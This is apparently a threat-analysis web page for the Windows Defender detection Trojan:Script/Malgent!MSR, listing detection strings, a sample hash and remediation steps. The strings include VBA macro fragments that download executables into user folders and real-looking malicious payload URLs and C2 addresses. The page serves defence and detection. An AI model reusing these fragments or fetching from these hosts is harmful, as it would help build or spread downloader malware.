Trojan:Script/Malgent!MSR - ThreatCheck.sh

user@threatcheck.sh ~ threat-analysis

bash

$ analyze-threat Trojan:Script/Malgent!MSR

Trojan:Script/Malgent!MSR - Windows Defender threat signature analysis

$ cat analysis.txt

=== THREAT ANALYSIS REPORT ===

Threat Name: Trojan:Script/Malgent!MSR

Classification:

Type:Trojan

Platform:Script

Family:Malgent

Detection Type:Concrete

Known malware family with identified signatures

Suffix:!MSR

High-priority threat flagged by Microsoft Security Response

Confidence:Very High

False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for Script platform, family Malgent

Summary:

Trojan:Script/Malgent!MSR is a concrete detection of a script-based Trojan, likely delivered via a malicious macro, designed to download and execute additional malware payloads from various remote servers. It employs obfuscation techniques, drops executables in user profile directories (Desktop, AppData, Temp), and establishes persistence for a multi-stage infection.

Severity:

Critical

VDM Static Detection:

Relevant strings associated with this threat:
 -  = Environ("USERPROFILE") & "\Desktop" & "\quotation.exe" (MACROHSTR_EXT)
 - http://45.78.21.150/boost/boosting.exe (MACROHSTR_EXT)
 - = Replace("ht##tp##:##/##/ (MACROHSTR_EXT)
 -  = (Err.Number = 0) (MACROHSTR_EXT)
 -  = (Environ("temp") & "\" &  (MACROHSTR_EXT)
 - path_file = Environ$("USERPROFILE") + "\AppData\Roaming\" + "\" + path_dom + a + b + c (MACROHSTR_EXT)
 - path_file = Environ$("USERPROFILE") & "\AppData\" + path_dom + ".ttp" (MACROHSTR_EXT)
 - Variable2.savetofile "234.e" & "xe", 2 (MACROHSTR_EXT)
 - ExecuteExcel4Macro Replace(UserForm1. (MACROHSTR_EXT)
 - 2C:\Codes\Version2\pe_encrypt\Release\PECloner.pdb (PEHSTR)
 - TmDbgLog.dll (PEHSTR_EXT)
 - ssMUIDLL.dll (PEHSTR_EXT)
 - arguments="https://d3727mhevtk2n4.cloudfront.net/srv-stg-agent (MACROHSTR_EXT)
 - Call trenes("http://kuzov-remont.com/wp-admin/js/win.exe", (MACROHSTR_EXT)
 - Environ("AppData") & "\Ds.exe") (MACROHSTR_EXT)
 - Environ("Userprofile") & "\Men (MACROHSTR_EXT)
 -  Inicio\Programas\Inicio\Ds.exe") (MACROHSTR_EXT)
 - Global\gfxQJsVUhkMOSadImwZFBbnpe2Gjv7HA (PEHSTR_EXT)
 - explorer.exe (PEHSTR_EXT)
 - svchost.exe (PEHSTR_EXT)
 - del "C:\Documents and Settings\All Usersd (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - CymulateScreenShotTrojan.pdb (PEHSTR_EXT)
 - i.ibb.co/q1B4wyW/nature-field-gra-130247647 (PEHSTR_EXT)
 - sdsdsdsds.pdb (PEHSTR_EXT)
 - DLL\test\Release\Dll1.pdb (PEHSTR_EXT)
 - "C:\Windows\iexplore.exe" (PEHSTR_EXT)
 - \Release\mfc.pdbd (PEHSTR_EXT)
 - zh-CN/NUSData/M2052Hongyu.voiceAssistant.unt (PEHSTR_EXT)
 - zh-CN/NUSData/M2052Kangkang.keyboard.unt (PEHSTR_EXT)
 - https://www.cuochiperungiorno.it/ (PEHSTR_EXT)
 - _Setup.exe (PEHSTR_EXT)
 - https://tapestryoftruth.com/ (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - E:\PROJETOS2023\CSHARP\RAT\MXNOBUGMAG\Bin\Release\msedge_elf.pdb (PEHSTR_EXT)
 - E:\PROJETOS2023\CSHARP\RAT\MXNOBUGMAG\Bin\Release\VCRUNTIME140.pdb (PEHSTR_EXT)
 - AppApi.dll (PEHSTR_EXT)
 - D:\a\_work\1\s\artifacts\obj\coreclr\windows.x86.Release\Corehost.Static\singlefilehost.pdb (PEHSTR_EXT)
 - G:\repos\ApiApp\AppApi\obj\Release\net9.0\win-x86\AppApi.pdb (PEHSTR_EXT)
 - info-sec.jp/attach (PEHSTR_EXT)
 - stgsec-info.jp/acon (PEHSTR_EXT)
 - PdfAttachProduction.exe (PEHSTR_EXT)
 - cm74336.tw1.ru/calc.execalc.exesrc (PEHSTR_EXT)
 - =createobject("msxml2.xmlhttp")http_obj.open"post","http://188.130.234.189/wait.php (MACROHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)

Known malware which is associated with this threat:

Filename: 2025-第四季度各企业违纪人员信息.exe

22d4b6abcb913f72e56915b76b6baaadacc48719e42b1776cbd5fc263da36a89

23/12/2025

→VirusTotal ↓Download Sample

Remediation Steps:

Immediately isolate the affected system, perform a full endpoint scan with updated security software to ensure complete removal, identify and delete all dropped malicious files and persistence entries, and block associated C2 URLs/IPs (e.g., 45.78.21.150, kuzov-remont.com, d3727mhevtk2n4.cloudfront.net) at the network perimeter.

=== END REPORT ===

$ reanalyze-threat

This analysis was last updated on 23/12/2025. Do you want to analyze it again?

$ ls available-commands/

→ cd /home

user@threatcheck.sh:~$ ▊

Trojan:Script/Malgent!MSR - Windows Defender Threat Analysis